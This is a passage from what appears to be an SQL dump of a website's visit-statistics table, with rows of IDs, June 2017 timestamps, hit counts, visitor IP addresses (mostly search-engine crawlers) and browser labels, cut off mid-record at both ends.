117168,1496389484,1,1,0,0,'87.250.224.7','other'),(117169,1496389485,1,1,0,0,'141.8.142.164','other'),(117170,1496389648,1,1,0,0,'91.196.178.71','chrome'),(117171,1496389729,1,0,1,0,'68.180.230.48',''),(117172,1496390304,1,1,0,0,'180.76.15.151','other'),(117173,1496390503,1,1,0,0,'217.182.132.76','other'),(117174,1496390587,2,0,2,0,'66.249.76.89',''),(117175,1496391035,1,0,1,0,'66.249.66.195',''),(117176,1496391209,1,1,0,0,'91.196.178.169','chrome'),(117177,1496391490,1,1,0,0,'40.77.167.5','other'),(117178,1496391561,1,1,0,0,'217.182.132.50','other'),(117179,1496391727,1,1,0,0,'217.182.132.152','other'),(117180,1496391870,1,1,0,0,'164.132.162.158','other'),(117181,1496391956,1,1,0,0,'164.132.162.160','other'),(117182,1496392376,1,1,0,0,'217.182.132.19','other'),(117183,1496392395,1,1,0,0,'91.196.178.68','chrome'),(117184,1496392505,1,1,0,0,'91.196.178.68','firefox'),(117185,1496392644,2,2,0,0,'37.73.237.232','chrome'),(117186,1496392817,1,1,0,0,'5.165.247.217','msie'),(117187,1496393195,1,1,0,0,'157.55.39.202','other'),(117188,1496393500,1,1,0,0,'66.249.66.201','chrome'),(117189,1496393549,1,1,0,0,'40.77.167.5','other'),(117190,1496393735,1,0,1,0,'66.249.76.89',''),(117191,1496394219,1,1,0,0,'217.182.132.60','other'),(117192,1496394493,1,1,0,0,'91.196.178.68','chrome'),(117193,1496395296,1,1,0,0,'164.132.161.52','other'),(117194,1496395581,1,1,0,0,'51.255.71.128','other'),(117195,1496395610,1,1,0,0,'95.132.23.13','firefox'),(117196,1496396057,1,1,0,0,'91.209.11.236','other'),(117197,1496396477,1,1,0,0,'66.249.66.156','chrome'),(117198,1496396492,1,0,1,0,'66.249.66.157',''),(117199,1496396499,1,1,0,0,'164.132.161.53','other'),(117200,1496396702,53,53,0,0,'69.30.198.202','other'),(117201,1496396749,1,1,0,0,'51.255.65.41','other'),(117202,1496397008,1,1,0,0,'130.180.217.41','firefox'),(117203,1496397241,1,1,0,0,'162.219.176.236','chrome'),(117204,1496397370,1,0,1,0,'66.249.66.158',''),(117205,1496397515,1,1,0,0,'217.182.132.186','other'),(117206,1496398018,2,0,2,0,'66.249.76.107',''),(117207,1496398052,1,0,1,0,'66.249.76.89',''),(117208,1496398104,1,0,1,0,'66.249.76.93',''),(117209,1496398141,1,0,1,0,'66.249.66.157',''),(117210,1496398309,1,1,0,0,'217.182.132.61','other'),(117211,1496398320,1,1,0,0,'217.182.132.51','other'),(117212,1496398489,10,10,0,0,'92.222.24.156','other'),(117213,1496398702,1,1,0,0,'66.249.76.107','chrome'),(117214,1496399020,1,1,0,0,'194.126.180.214','chrome'),(117215,1496399194,1,1,0,0,'8.29.198.27','other'),(117216,1496399622,1,1,0,0,'217.182.132.153','other'),(117217,1496400385,1,0,1,0,'66.249.66.157',''),(117218,1496400415,1,1,0,0,'164.132.161.58','other'),(117219,1496401793,1,1,0,0,'164.132.161.84','other'),(117220,1496402999,1,1,0,0,'51.255.65.35','other'),(117221,1496403061,1,0,1,0,'68.180.230.48',''),(117222,1496403355,1,1,0,0,'217.182.132.29','other'),(117223,1496404541,2,2,0,0,'217.80.216.212','other'),(117224,1496404580,1,1,0,0,'157.55.39.120','other'),(117225,1496404972,1,1,0,0,'217.69.134.176','other'),(117226,1496405023,1,0,1,0,'66.249.76.91',''),(117227,1496405782,1,1,0,0,'66.249.76.108','chrome'),(117228,1496406815,1,0,1,0,'66.249.76.93',''),(117229,1496406963,1,1,0,0,'137.74.207.108','other'),(117230,1496407189,1,1,0,0,'195.49.151.89','chrome'),(117231,1496407205,1,1,0,0,'178.154.200.64','other'),(117232,1496407402,1,1,0,0,'164.132.161.64','other'),(117233,1496407425,1,1,0,0,'164.132.161.62','other'),(117234,1496407617,1,0,1,0,'66.249.76.89',''),(117235,1496408174,1,1,0,0,'164.132.161.92','other'),(117236,1496408392,1,0,1,0,'66.249.76.107',''),(117237,1496408533,1,1,0,0,'164.132.161.78','other'),(117238,1496408968,1,1,0,0,'31.43.27.164','chrome'),(117239,1496409749,1,1,0,0,'51.255.65.68','other'),(117240,1496410051,1,1,0,0,'8.29.198.27','other'),(117241,1496410524,1,1,0,0,'164.132.161.64','other'),(117242,1496410610,1,1,0,0,'40.77.167.5','other'),(117243,1496410871,1,1,0,0,'92.113.126.107','chrome'),(117244,1496412417,1,1,0,0,'217.182.132.72','other'),(117245,1496412471,1,1,0,0,'217.182.132.35','other'),(117246,1496412523,1,1,0,0,'180.76.15.24','other'),(117247,1496412604,2,2,0,0,'162.210.196.130','other'),(117248,1496413028,1,1,0,0,'137.74.207.110','other'),(117249,1496413056,1,1,0,0,'51.255.65.30','other'),(117250,1496413873,1,1,0,0,'217.182.132.35','other'),(117251,1496414284,2,2,0,0,'66.249.76.89','chrome'),(117252,1496414492,1,1,0,0,'66.249.76.93','chrome'),(117253,1496414523,1,1,0,0,'66.249.76.109','chrome'),(117254,1496414543,1,1,0,0,'66.249.76.91','chrome'),(117255,1496414568,2,2,0,0,'66.249.66.195','chrome'),(117256,1496414875,1,1,0,0,'66.249.76.108','chrome'),(117257,1496415270,1,1,0,0,'207.46.13.136','other'),(117258,1496415571,1,0,1,0,'66.249.66.201',''),(117259,1496415573,1,0,1,0,'66.249.76.91',''),(117260,1496415575,1,0,1,0,'66.249.66.158',''),(117261,1496415752,2,2,0,0,'178.154.200.64','other'),(117262,1496415764,4,4,0,0,'141.8.142.48','other'),(117263,1496415773,2,2,0,0,'141.8.142.91','other'),(117264,1496415782,2,2,0,0,'178.154.189.14','other'),(117265,1496415794,1,1,0,0,'178.154.189.3','other'),(117266,1496415806,2,2,0,0,'95.108.213.34','other'),(117267,1496415817,1,1,0,0,'87.250.224.24','other'),(117268,1496415827,1,1,0,0,'95.108.181.26','other'),(117269,1496415831,1,1,0,0,'95.108.179.8','other'),(117270,1496415838,1,1,0,0,'95.108.213.8','other'),(117271,1496415859,2,2,0,0,'5.255.253.63','other'),(117272,1496415870,3,3,0,0,'141.8.132.39','other'),(117273,1496415878,2,2,0,0,'178.154.200.60','other'),(117274,1496415885,2,2,0,0,'141.8.132.43','other'),(117275,1496415904,3,3,0,0,'141.8.142.38','other'),(117276,1496415910,1,1,0,0,'141.8.142.154','other'),(117277,1496415914,2,2,0,0,'141.8.132.50','other'),(117278,1496415917,2,2,0,0,'141.8.142.15','other'),(117279,1496415922,1,1,0,0,'5.255.253.31','other'),(117280,1496415931,1,1,0,0,'141.8.142.28','other'),(117281,1496415935,2,2,0,0,'93.158.152.60','other'),(117282,1496415941,2,2,0,0,'141.8.142.164','other'),(117283,1496415949,2,2,0,0,'93.158.152.79','other'),(117284,1496415956,1,1,0,0,'141.8.132.25','other'),(117285,1496415974,2,2,0,0,'178.154.189.22','other'),(117286,1496415982,1,1,0,0,'95.108.179.15','other'),(117287,1496415994,1,1,0,0,'141.8.142.49','other'),(117288,1496416279,1,1,0,0,'164.132.161.62','other'),(117289,1496416367,1,1,0,0,'193.164.95.197','other'),(117290,1496416506,1,1,0,0,'157.55.39.202','other'),(117291,1496416570,1,0,1,0,'66.249.76.109',''),(117292,1496416996,1,1,0,0,'51.255.71.133','other'),(117293,1496416999,1,1,0,0,'164.132.161.52','other'),(117294,1496417020,1,1,0,0,'217.182.132.21','other'),(117295,1496417796,1,1,0,0,'217.182.132.55','other'),(117296,1496417934,1,0,1,0,'66.249.66.199',''),(117297,1496417999,1,1,0,0,'51.255.65.92','other'),(117298,1496418663,1,0,1,0,'66.249.76.107',''),(117299,1496419090,1,1,0,0,'188.166.87.191','firefox'),(117300,1496419524,1,1,0,0,'91.209.11.236','other'),(117301,1496419617,1,1,0,0,'157.55.39.169','other'),(117302,1496419808,1,1,0,0,'164.132.161.62','other'),(117303,1496419919,1,1,0,0,'95.108.179.15','other'),(117304,1496419936,2,2,0,0,'141.8.142.15','other'),(117305,1496420042,1,1,0,0,'5.255.253.58','other'),(117306,1496420049,2,2,0,0,'141.8.142.154','other'),(117307,1496420061,1,1,0,0,'95.108.213.34','other'),(117308,1496420194,1,0,1,0,'66.249.76.91',''),(117309,1496420198,1,0,1,0,'66.249.66.199',''),(117310,1496420213,1,0,1,0,'66.249.76.89',''),(117311,1496420266,1,1,0,0,'178.154.200.45','other'),(117312,1496420281,1,1,0,0,'141.8.142.38','other'),(117313,1496420841,1,1,0,0,'51.255.65.81','other'),(117314,1496420908,1,1,0,0,'8.29.198.25','other'),(117315,1496420915,1,1,0,0,'180.76.15.152','other'),(117316,1496421802,1,1,0,0,'217.182.132.177','other'),(117317,1496422008,1,0,1,0,'66.249.76.89',''),(117318,1496422884,1,1,0,0,'157.55.39.202','other'),(117319,1496423012,1,1,0,0,'217.182.132.15','other'),(117320,1496423235,1,1,0,0,'95.108.179.15','other'),(117321,1496423483,1,1,0,0,'164.132.161.85','other'),(117322,1496423605,1,1,0,0,'193.194.127.217','firefox'),(117323,1496424261,1,0,1,0,'66.249.66.157',''),(117324,1496424285,1,1,0,0,'51.255.65.89','other'),(117325,1496424406,1,1,0,0,'217.182.132.187','other'),(117326,1496424456,1,1,0,0,'185.137.18.235','chrome'),(117327,1496424512,1,1,0,0,'66.249.76.109','chrome'),(117328,1496424570,1,1,0,0,'87.250.224.7','other'),(117329,1496424623,1,1,0,0,'51.255.65.51','other'),(117330,1496424857,1,1,0,0,'217.182.132.153','other'),(117331,1496424941,1,1,0,0,'137.74.207.114','other'),(117332,1496425342,1,1,0,0,'91.209.11.236','other'),(117333,1496425388,1,0,1,0,'66.249.66.201',''),(117334,1496425416,1,1,0,0,'207.46.13.136','other'),(117335,1496425560,1,1,0,0,'51.255.65.75','other'),(117336,1496425889,1,1,0,0,'51.255.65.44','other'),(117337,1496426087,2,2,0,0,'164.132.161.56','other'),(117338,1496426421,1,1,0,0,'95.108.213.34','other'),(117339,1496426446,1,1,0,0,'137.74.207.119','other'),(117340,1496426520,1,1,0,0,'141.8.142.15','other'),(117341,1496426526,1,1,0,0,'51.255.65.27','other'),(117342,1496426536,2,2,0,0,'87.250.224.7','other'),(117343,1496426545,1,1,0,0,'164.132.161.28','other'),(117344,1496426577,1,1,0,0,'141.8.142.154','other'),(117345,1496427013,1,1,0,0,'217.182.132.190','other'),(117346,1496427244,1,1,0,0,'176.105.24.90','firefox'),(117347,1496427318,1,0,1,0,'66.249.64.155',''),(117348,1496427419,1,0,1,0,'66.249.64.29',''),(117349,1496427463,1,1,0,0,'217.182.132.18','other'),(117350,1496427833,1,1,0,0,'109.236.81.133','chrome'),(117351,1496427903,1,1,0,0,'51.255.65.63','other'),(117352,1496427955,2,0,2,0,'66.249.64.157',''),(117353,1496428017,1,1,0,0,'164.132.164.180','other'),(117354,1496428300,1,1,0,0,'207.46.13.136','other'),(117355,1496428804,1,1,0,0,'217.182.132.75','other'),(117356,1496428915,1,1,0,0,'217.182.132.188','other'),(117357,1496429087,1,1,0,0,'141.8.142.38','other'),(117358,1496429176,1,1,0,0,'178.154.189.3','other'),(117359,1496429182,1,1,0,0,'51.255.65.5','other'),(117360,1496429227,1,1,0,0,'178.154.200.45','other'),(117361,1496429242,2,2,0,0,'95.108.179.15','other'),(117362,1496429275,1,1,0,0,'95.108.213.34','other'),(117363,1496429293,1,1,0,0,'5.255.253.63','other'),(117364,1496429311,2,2,0,0,'87.250.224.7','other'),(117365,1496429393,1,0,1,0,'66.249.64.155',''),(117366,1496429511,1,1,0,0,'92.113.126.107','chrome'),(117367,1496429556,1,1,0,0,'141.0.13.121','other'),(117368,1496429630,1,1,0,0,'109.236.81.133','chrome'),(117369,1496429645,1,1,0,0,'51.255.71.100','other'),(117370,1496430262,2,2,0,0,'157.55.39.169','other'),(117371,1496430316,1,1,0,0,'66.249.64.29','chrome'),(117372,1496430318,2,0,2,0,'66.249.64.157',''),(117373,1496430382,1,1,0,0,'91.209.11.236','other'),(117374,1496430684,1,1,0,0,'180.76.15.162','other'),(117375,1496430735,1,1,0,0,'66.249.64.153','chrome'),(117376,1496430897,2,2,0,0,'87.250.224.7','other'),(117377,1496431153,1,1,0,0,'95.108.213.7','other'),(117378,1496431199,1,1,0,0,'141.8.142.164','other'),(117379,1496431227,1,1,0,0,'91.196.178.161','chrome'),(117380,1496431239,2,2,0,0,'5.255.253.28','other'),(117381,1496431242,2,2,0,0,'5.255.253.81','other'),(117382,1496431291,3,3,0,0,'141.8.132.25','other'),(117383,1496431401,4,4,0,0,'95.108.213.34','other'),(117384,1496431437,1,1,0,0,'109.236.81.133','chrome'),(117385,1496431451,3,3,0,0,'141.8.142.15','other'),(117386,1496431531,2,2,0,0,'178.154.149.3','other'),(117387,1496431622,2,2,0,0,'157.55.39.169','other'),(117388,1496431766,1,1,0,0,'8.29.198.27','other'),(117389,1496431831,2,2,0,0,'141.8.142.154','other'),(117390,1496431862,1,1,0,0,'141.8.142.97','other'),(117391,1496431885,1,1,0,0,'5.255.253.63','other'),(117392,1496432010,1,1,0,0,'51.255.71.98','other'),(117393,1496432018,4,4,0,0,'95.108.179.15','other'),(117394,1496432659,1,1,0,0,'91.196.178.38','chrome'),(117395,1496432737,1,0,1,0,'66.249.64.30',''),(117396,1496432778,1,0,1,0,'66.249.64.157',''),(117397,1496433230,1,1,0,0,'109.236.81.133','chrome'),(117398,1496433778,1,1,0,0,'109.236.81.202','msie'),(117399,1496433940,1,1,0,0,'92.113.20.154','chrome'),(117400,1496433952,1,1,0,0,'137.74.207.116','other'),(117401,1496434118,1,0,1,0,'66.249.64.28',''),(117402,1496434397,1,0,1,0,'66.249.64.29',''),(117403,1496434434,1,0,1,0,'66.249.64.153',''),(117404,1496434634,1,0,1,0,'66.249.64.155',''),(117405,1496435030,1,1,0,0,'109.236.81.133','chrome'),(117406,1496435337,1,1,0,0,'157.55.39.202','other'),(117407,1496435713,1,1,0,0,'95.108.213.8','other'),(117408,1496436297,1,1,0,0,'51.255.65.50','other'),(117409,1496436549,1,1,0,0,'164.132.162.159','other'),(117410,1496436778,1,1,0,0,'95.108.213.34','other'),(117411,1496436828,1,1,0,0,'51.255.65.62','other'),(117412,1496436831,1,1,0,0,'109.236.81.133','chrome'),(117413,1496436936,1,1,0,0,'93.115.95.207','chrome'),(117414,1496436961,3,3,0,0,'69.30.198.178','other'),(117415,1496437697,1,1,0,0,'217.182.132.23','other'),(117416,1496438527,1,1,0,0,'164.132.161.11','other'),(117417,1496438630,1,1,0,0,'109.236.81.133','chrome'),(117418,1496438874,1,1,0,0,'51.255.71.114','other'),(117419,1496438903,1,1,0,0,'93.158.152.59','other'),(117420,1496438909,1,1,0,0,'217.182.132.54','other'),(117421,1496438985,1,1,0,0,'95.108.213.32','other'),(117422,1496439038,1,1,0,0,'95.108.179.21','other'),(117423,1496439066,1,1,0,0,'93.158.152.60','other'),(117424,1496439069,1,1,0,0,'178.154.200.37','other'),(117425,1496439304,1,1,0,0,'207.46.13.136','other'),(117426,1496439429,1,0,1,0,'66.249.64.30',''),(117427,1496439730,1,1,0,0,'164.132.161.77','other'),(117428,1496441288,1,1,0,0,'137.74.207.109','other'),(117429,1496441313,1,1,0,0,'66.249.64.157','chrome'),(117430,1496441747,1,1,0,0,'51.255.71.113','other'),(117431,1496441770,1,1,0,0,'51.255.71.125','other'),(117432,1496442012,1,1,0,0,'66.249.64.155','chrome'),(117433,1496442049,1,1,0,0,'217.182.132.156','other'),(117434,1496442143,1,1,0,0,'51.255.65.2','other'),(117435,1496442186,1,1,0,0,'95.108.179.15','other'),(117436,1496442365,1,1,0,0,'141.8.142.15','other'),(117437,1496442421,1,1,0,0,'51.255.65.81','other'),(117438,1496442627,1,1,0,0,'8.29.198.26','other'),(117439,1496443076,1,1,0,0,'51.255.65.21','other'),(117440,1496443599,1,0,1,0,'66.249.64.157',''),(117441,1496443970,1,1,0,0,'217.182.132.95','other'),(117442,1496444091,1,1,0,0,'51.255.65.34','other'),(117443,1496444138,1,1,0,0,'51.255.71.126','other'),(117444,1496444808,1,1,0,0,'217.182.132.33','other'),(117445,1496445556,1,1,0,0,'51.255.65.83','other'),(117446,1496445734,1,1,0,0,'37.9.113.43','other'),(117447,1496445754,1,1,0,0,'87.250.224.7','other'),(117448,1496445782,1,1,0,0,'141.8.142.154','other'),(117449,1496446099,1,1,0,0,'217.182.132.192','other'),(117450,1496446112,1,1,0,0,'51.255.65.16','other'),(117451,1496446398,1,0,1,0,'66.249.64.155',''),(117452,1496446958,1,1,0,0,'164.132.162.164','other'),(117453,1496446964,1,1,0,0,'164.132.161.42','other'),(117454,1496448334,1,1,0,0,'164.132.161.91','other'),(117455,1496448730,1,1,0,0,'217.182.132.76','other'),(117456,1496449209,1,1,0,0,'51.255.65.10','other'),(117457,1496449503,1,1,0,0,'66.249.64.153','chrome'),(117458,1496449592,1,1,0,0,'217.69.134.160','other'),(117459,1496449623,1,1,0,0,'66.249.64.157','chrome'),(117460,1496449990,1,1,0,0,'51.255.65.14','other'),(117461,1496450188,1,0,1,0,'66.249.64.29',''),(117462,1496450270,1,1,0,0,'217.182.132.187','other'),(117463,1496450993,1,1,0,0,'217.182.132.184','other'),(117464,1496451096,1,0,1,0,'66.249.64.28',''),(117465,1496451391,1,1,0,0,'40.77.167.17','other'),(117466,1496451705,1,1,0,0,'164.132.161.55','other'),(117467,1496451790,1,1,0,0,'46.108.39.250','firefox'),(117468,1496452261,1,0,1,0,'66.249.64.157',''),(117469,1496452636,1,1,0,0,'208.110.93.52','other'),(117470,1496452718,1,0,1,0,'66.249.64.28',''),(117471,1496452743,1,0,1,0,'66.249.64.155',''),(117472,1496453483,1,1,0,0,'8.29.198.26','other'),(117473,1496453722,1,1,0,0,'51.255.71.132','other'),(117474,1496453811,1,0,1,0,'66.249.64.28',''),(117475,1496454274,1,1,0,0,'164.132.161.20','other'),(117476,1496454290,1,1,0,0,'157.55.39.169','other'),(117477,1496454361,1,1,0,0,'217.182.132.60','other'),(117478,1496454590,1,1,0,0,'51.255.65.18','other'),(117479,1496454769,1,1,0,0,'164.132.161.18','other'),(117480,1496454810,1,0,1,0,'66.249.64.28',''),(117481,1496455320,1,1,0,0,'164.132.161.19','other'),(117482,1496455352,1,1,0,0,'164.132.161.25','other'),(117483,1496455359,1,0,1,0,'66.249.64.155',''),(117484,1496455459,1,0,1,0,'66.249.64.157',''),(117485,1496456466,1,0,1,0,'66.249.64.153',''),(117486,1496456923,1,1,0,0,'51.255.65.36','other'),(117487,1496457214,1,1,0,0,'164.132.161.87','other'),(117488,1496457545,1,1,0,0,'137.74.203.194','other'),(117489,1496457566,1,1,0,0,'46.108.39.250','chrome'),(117490,1496457573,1,1,0,0,'164.132.161.92','other'),(117491,1496457591,1,1,0,0,'164.132.161.61','other'),(117492,1496457593,1,1,0,0,'51.255.65.32','other'),(117493,1496457746,1,1,0,0,'217.182.132.96','other'),(117494,1496457900,1,1,0,0,'51.255.65.68','other'),(117495,1496458242,1,1,0,0,'217.182.132.191','other'),(117496,1496458912,1,1,0,0,'217.182.132.5','other'),(117497,1496458927,1,1,0,0,'51.255.71.121','other'),(117498,1496458943,1,1,0,0,'51.255.65.51','other'),(117499,1496459782,1,0,1,0,'66.249.64.29',''),(117500,1496460226,1,1,0,0,'207.46.13.136','other'),(117501,1496460387,1,1,0,0,'51.255.65.38','other'),(117502,1496460510,1,1,0,0,'164.132.161.19','other'),(117503,1496460739,1,1,0,0,'51.255.65.22','other'),(117504,1496461604,1,1,0,0,'51.255.65.19','other'),(117505,1496461634,1,1,0,0,'164.132.161.90','other'),(117506,1496461774,1,1,0,0,'164.132.161.31','other'),(117507,1496461922,1,1,0,0,'51.255.65.5','other'),(117508,1496462048,1,0,1,0,'66.249.64.30',''),(117509,1496462071,1,0,1,0,'66.249.64.153',''),(117510,1496462773,1,1,0,0,'157.55.39.169','other'),(117511,1496463347,1,1,0,0,'164.132.161.58','other'),(117512,1496463613,1,1,0,0,'217.182.132.27','other'),(117513,1496464336,1,1,0,0,'8.29.198.27','other'),(117514,1496464620,1,1,0,0,'164.132.161.23','other'),(117515,1496464713,1,1,0,0,'51.255.65.93','other'),(117516,1496464782,1,1,0,0,'217.182.132.156','other'),(117517,1496465635,1,1,0,0,'217.182.132.193','other'),(117518,1496466129,1,1,0,0,'164.132.161.55','other'),(117519,1496466225,1,1,0,0,'157.55.39.202','other'),(117520,1496466478,1,1,0,0,'137.74.207.119','other'),(117521,1496466779,1,1,0,0,'51.255.71.100','other'),(117522,1496466794,1,1,0,0,'164.132.161.43','other'),(117523,1496466863,1,1,0,0,'51.255.65.28','other'),(117524,1496467903,3,3,0,0,'91.209.11.236','other'),(117525,1496468109,1,1,0,0,'51.255.71.130','other'),(117526,1496468301,1,0,1,0,'66.249.64.28',''),(117527,1496468360,1,1,0,0,'157.55.39.169','other'),(117528,1496469394,1,1,0,0,'164.132.161.68','other'),(117529,1496469400,4,4,0,0,'91.209.11.236','other'),(117530,1496469449,1,0,1,0,'66.249.64.153',''),(117531,1496469492,1,0,1,0,'66.249.64.157',''),(117532,1496470032,1,1,0,0,'66.249.64.30','chrome'),(117533,1496470312,1,0,1,0,'66.249.64.29',''),(117534,1496470595,1,1,0,0,'164.132.161.8','other'),(117535,1496470625,1,1,0,0,'180.76.15.148','other'),(117536,1496470904,1,1,0,0,'217.182.132.177','other'),(117537,1496471204,1,1,0,0,'51.255.65.48','other'),(117538,1496471393,1,1,0,0,'51.255.71.121','other'),(117539,1496472074,1,0,1,0,'66.249.64.30',''),(117540,1496473166,1,0,1,0,'66.249.64.30',''),(117541,1496473495,1,1,0,0,'164.132.161.71','other'),(117542,1496473818,1,1,0,0,'164.132.161.13','other'),(117543,1496473857,1,1,0,0,'164.132.161.48','other'),(117544,1496474257,1,1,0,0,'217.182.132.152','other'),(117545,1496474296,1,1,0,0,'217.182.132.4','other'),(117546,1496474386,1,1,0,0,'157.55.39.153','other'),(117547,1496475024,1,1,0,0,'164.132.161.37','other'),(117548,1496475205,1,1,0,0,'8.29.198.25','other'),(117549,1496475505,1,1,0,0,'157.55.39.153','other'),(117550,1496475791,1,1,0,0,'217.182.132.69','other'),(117551,1496475800,1,1,0,0,'51.255.65.16','other'),(117552,1496475878,1,0,1,0,'66.249.64.28',''),(117553,1496475884,1,0,1,0,'66.249.64.153',''),(117554,1496476206,1,1,0,0,'51.255.65.68','other'),(117555,1496476680,2,1,1,0,'66.249.64.153',''),(117556,1496476771,1,1,0,0,'51.255.65.16','other'),(117557,1496476802,1,1,0,0,'51.255.65.37','other'),(117558,1496476919,1,1,0,0,'217.69.135.204','other'),(117559,1496477343,1,1,0,0,'217.182.132.176','other'),(117560,1496478542,1,1,0,0,'51.255.71.114','other'),(117561,1496478733,1,1,0,0,'162.210.196.130','other'),(117562,1496478759,1,1,0,0,'217.182.132.152','other'),(117563,1496478986,1,1,0,0,'164.132.161.60','other'),(117564,1496479004,4,4,0,0,'91.209.11.236','other'),(117565,1496479785,1,1,0,0,'51.255.65.40','other'),(117566,1496481597,1,1,0,0,'217.182.132.153','other'),(117567,1496481859,1,1,0,0,'51.255.65.31','other'),(117568,1496482715,91,91,0,0,'208.110.93.52','other'),(117569,1496483570,2,2,0,0,'91.209.11.236','other'),(117570,1496483972,1,0,1,0,'66.249.64.155',''),(117571,1496484487,1,1,0,0,'51.255.65.95','other'),(117572,1496484721,1,1,0,0,'164.132.161.32','other'),(117573,1496484812,1,1,0,0,'217.182.132.149','other'),(117574,1496484916,1,1,0,0,'164.132.162.188','other'),(117575,1496485143,1,1,0,0,'5.248.138.158','chrome'),(117576,1496486058,1,1,0,0,'8.29.198.26','other'),(117577,1496486102,1,1,0,0,'164.132.162.158','other'),(117578,1496486233,1,1,0,0,'66.249.64.30','chrome'),(117579,1496486494,1,0,1,0,'66.249.64.157',''),(117580,1496486763,1,1,0,0,'51.255.65.92','other'),(117581,1496487017,1,1,0,0,'40.77.167.17','other'),(117582,1496487966,1,1,0,0,'95.108.181.26','other'),(117583,1496488070,1,1,0,0,'40.77.167.39','other'),(117584,1496488996,2,2,0,0,'141.8.142.164','other'),(117585,1496489002,2,2,0,0,'5.255.253.63','other'),(117586,1496489006,2,2,0,0,'141.8.142.15','other'),(117587,1496489014,1,1,0,0,'87.250.224.7','other'),(117588,1496489018,1,1,0,0,'87.250.224.18','other'),(117589,1496489019,1,1,0,0,'51.255.65.88','other'),(117590,1496489027,2,2,0,0,'141.8.142.154','other'),(117591,1496489031,1,1,0,0,'95.108.179.15','other'),(117592,1496489223,1,1,0,0,'164.132.161.49','other'),(117593,1496489464,1,0,1,0,'66.249.64.157',''),(117594,1496490250,1,1,0,0,'51.255.71.113','other'),(117595,1496490692,2,2,0,0,'64.62.210.39','chrome'),(117596,1496490784,1,1,0,0,'51.255.65.62','other'),(117597,1496491145,1,1,0,0,'217.182.132.29','other'),(117598,1496491565,1,0,1,0,'66.249.64.28',''),(117599,1496491610,1,1,0,0,'217.182.132.31','other'),(117600,1496491649,1,1,0,0,'66.102.9.40','chrome'),(117601,1496491747,2,2,0,0,'66.249.64.28','chrome'),(117602,1496491961,1,1,0,0,'66.249.64.29','chrome'),(117603,1496491986,2,2,0,0,'178.154.149.3','other'),(117604,1496492000,1,1,0,0,'178.154.200.37','other'),(117605,1496492210,1,1,0,0,'141.8.132.25','other'),(117606,1496492274,2,1,1,0,'66.249.64.157',''),(117607,1496492283,1,1,0,0,'141.8.142.97','other'),(117608,1496492467,1,1,0,0,'95.108.213.34','other'),(117609,1496492493,1,1,0,0,'217.182.132.181','other'),(117610,1496492515,1,1,0,0,'141.8.142.49','other'),(117611,1496492581,1,1,0,0,'141.8.142.42','other'),(117612,1496492592,1,1,0,0,'164.132.161.60','other'),(117613,1496492645,1,1,0,0,'217.182.132.154','other'),(117614,1496492682,1,1,0,0,'66.249.64.30','chrome'),(117615,1496492697,1,1,0,0,'95.108.179.15','other'),(117616,1496492698,1,1,0,0,'164.132.161.15','other'),(117617,1496493294,1,1,0,0,'66.249.64.157','chrome'),(117618,1496493361,1,1,0,0,'217.182.132.55','other'),(117619,1496493484,1,1,0,0,'51.255.65.38','other'),(117620,1496493521,1,1,0,0,'51.255.65.31','other'),(117621,1496493668,1,0,1,0,'66.249.64.30',''),(117622,1496494185,1,0,1,0,'66.249.64.153',''),(117623,1496494186,1,0,1,0,'66.249.64.155',''),(117624,1496494356,1,1,0,0,'51.255.71.116','other'),(117625,1496494512,1,0,1,0,'66.249.64.28',''),(117626,1496494651,3,3,0,0,'178.154.200.37','other'),(117627,1496494714,1,1,0,0,'5.255.253.81','other'),(117628,1496494755,1,1,0,0,'87.250.224.16','other'),(117629,1496494782,1,1,0,0,'95.108.179.15','other'),(117630,1496494915,1,1,0,0,'164.132.161.23','other'),(117631,1496494997,3,3,0,0,'144.76.6.230','other'),(117632,1496495126,1,1,0,0,'95.108.213.34','other'),(117633,1496495271,1,1,0,0,'178.154.189.3','other'),(117634,1496495380,1,1,0,0,'217.182.132.30','other'),(117635,1496495415,1,1,0,0,'66.249.64.28','chrome'),(117636,1496495662,1,1,0,0,'141.8.142.164','other'),(117637,1496495802,1,1,0,0,'141.8.142.38','other'),(117638,1496495867,1,1,0,0,'51.255.71.110','other'),(117639,1496496464,1,1,0,0,'51.255.65.42','other'),(117640,1496496757,1,0,1,0,'66.249.79.93',''),(117641,1496496798,1,0,1,0,'66.249.64.155',''),(117642,1496496904,1,1,0,0,'8.29.198.25','other'),(117643,1496496921,2,2,0,0,'141.8.142.15','other'),(117644,1496497081,1,1,0,0,'137.74.207.164','other'),(117645,1496497556,1,1,0,0,'95.108.179.15','other'),(117646,1496497969,1,1,0,0,'212.33.255.53','other'),(117647,1496497970,1,1,0,0,'212.33.255.53','msie'),(117648,1496498158,1,1,0,0,'66.249.64.28','chrome'),(117649,1496498642,1,1,0,0,'51.255.65.10','other'),(117650,1496498934,1,0,1,0,'66.249.64.155',''),(117651,1496500009,1,1,0,0,'66.249.64.153','chrome'),(117652,1496500023,1,0,1,0,'66.249.64.155',''),(117653,1496500068,1,1,0,0,'66.249.64.155','chrome'),(117654,1496503063,1,1,0,0,'66.249.64.29','chrome'),(117655,1496503584,1,1,0,0,'91.209.11.236','other'),(117656,1496503967,1,1,0,0,'66.249.64.153','chrome'),(117657,1496504620,1,1,0,0,'66.249.64.29','chrome'),(117658,1496506001,1,0,1,0,'66.249.64.30',''),(117659,1496506505,1,1,0,0,'66.249.64.153','chrome'),(117660,1496507606,1,0,1,0,'66.249.64.155',''),(117661,1496507743,1,1,0,0,'8.29.198.26','other'),(117662,1496507859,1,1,0,0,'66.249.64.28','chrome'),(117663,1496509091,1,1,0,0,'157.55.39.169','other'),(117664,1496509877,1,1,0,0,'66.249.64.29','chrome'),(117665,1496510686,1,1,0,0,'5.255.253.58','other'),(117666,1496510863,1,0,1,0,'66.249.64.15',''),(117667,1496510939,1,0,1,0,'66.249.64.14',''),(117668,1496511000,1,0,1,0,'66.249.64.137',''),(117669,1496511171,1,1,0,0,'157.55.39.246','other'),(117670,1496511731,1,1,0,0,'141.8.142.154','other'),(117671,1496511829,1,1,0,0,'128.69.234.225','msie'),(117672,1496511973,1,1,0,0,'107.21.1.8','other'),(117673,1496512257,1,0,1,0,'66.249.64.29',''),(117674,1496512316,1,0,1,0,'66.249.64.157',''),(117675,1496513510,1,0,1,0,'66.249.65.56',''),(117676,1496513569,1,1,0,0,'66.249.65.55','chrome'),(117677,1496513578,1,1,0,0,'217.182.132.182','other'),(117678,1496513861,1,1,0,0,'217.182.132.68','other'),(117679,1496514164,1,1,0,0,'164.132.161.85','other'),(117680,1496514166,2,2,0,0,'66.249.65.60','chrome'),(117681,1496514369,1,1,0,0,'188.166.66.49','chrome'),(117682,1496514459,1,1,0,0,'91.209.11.236','other'),(117683,149651648